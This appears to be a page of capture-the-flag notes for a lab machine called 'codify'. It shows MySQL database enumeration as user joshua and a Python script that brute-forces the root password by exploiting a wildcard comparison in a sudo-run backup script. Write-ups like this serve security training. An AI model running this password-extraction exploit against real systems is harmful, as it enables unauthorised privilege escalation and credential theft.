root

joshua@codify:~$ mysql -u joshua -h 0.0.0.0 -P 3306 -p -e "SHOW DATABASES;"
Enter password: 
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
joshua@codify:~$ 
joshua@codify:~$ mysql -u joshua -h 0.0.0.0 -P 3306 -p -e "SHOW DATABASES;"
Enter password: 
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
joshua@codify:~$ mysql -u joshua -h 0.0.0.0 -P 3306 -p -e "USE mysql;SHOW TABLES;"
Enter password: 
ERROR 1045 (28000): Access denied for user 'joshua'@'172.19.0.1' (using password: YES)
joshua@codify:~$ mysql -u joshua -h 0.0.0.0 -P 3306 -p -e "USE mysql;SHOW TABLES;"
Enter password: 
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| global_priv               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |
| user                      |
+---------------------------+

Allows you to use * when asked for password because of this insecure operator

import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
found = False

while not found:
    for character in all:
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout

        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        found = True

Previousjoshua Nextemails

Last updated 1 year ago

Was this helpful?